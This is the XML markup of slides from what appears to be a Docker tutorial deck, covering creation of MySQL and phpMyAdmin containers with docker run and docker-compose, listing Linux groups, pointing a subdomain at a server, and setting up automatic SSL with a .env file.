            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Done</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker compose (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recommended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4701"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4702" name="Google Shape;4702;p76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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are 2 ways to create these containers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4703" name="Google Shape;4703;p7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marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker run --name mysql_db_server -e MYSQL_ROOT_PASSWORD=12345678 -d mysql:latest</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker run --name phpmyadmin -d --link mysql_db_server:db -p 8080:80 phpmyadmin:latest</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="76200" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4707"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4708" name="Google Shape;4708;p763"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="11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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create PhpMyAdmin and MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>container</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> user Docker Compose</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4709" name="Google Shape;4709;p763"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1581100"/>
            <a:ext cx="8520600" cy="2987700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker-compose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.yml</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1588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How to check list of linux groups?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="Google Shape;538;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2030275"/>
            <a:ext cx="8520600" cy="1243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5200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat  /etc/group</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4713"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4714" name="Google Shape;4714;p764"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="11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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create PhpMyAdmin and MySQL container user Docker Compose</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4715" name="Google Shape;4715;p764"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1581100"/>
            <a:ext cx="8520600" cy="2987700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>No Containers = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>No Services</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>2 Continaers  = 2 Services</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4719"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4720" name="Google Shape;4720;p765"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="113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2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create PhpMyAdmin and MySQL container user Docker Compose</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4721" name="Google Shape;4721;p765"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1581100"/>
            <a:ext cx="8520600" cy="2987700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9FA"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Which service depends on which another services</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9FA"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4725"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4726" name="Google Shape;4726;p766"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181200" y="2285400"/>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Docker-compose.yml Sample</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4730"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4731" name="Google Shape;4731;p767"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355200" y="200075"/>
            <a:ext cx="8520600" cy="468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services:</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pma_service1:</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image: phpmyadmin:latest</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depends_on:</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 db</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ports:</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    HP:CP</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 "5080:80"</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db:</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image: mysql:latest</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environment:</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rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      MYSQL_ROOT_PASSWORD: 12345678</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rgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4735"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4736" name="Google Shape;4736;p768"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="314325"/>
            <a:ext cx="9144000" cy="4829173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4737" name="Google Shape;4737;p768"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1633300" y="86975"/>
            <a:ext cx="5328300" cy="4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WinSCP Hidden Files</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4741"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4742" name="Google Shape;4742;p7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43" name="Google Shape;4743;p7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2700">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.vishalmahawar.shop -&gt; 45.136.17.143  </a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4747"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4748" name="Google Shape;4748;p770"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273350" y="149700"/>
            <a:ext cx="8743500" cy="8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700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatically get SSL when container start</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4749" name="Google Shape;4749;p770"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529475" y="1100100"/>
            <a:ext cx="8335500" cy="38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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We have</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.env(environment)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONSTANT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>constant_value</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FQDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subdomain.example.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
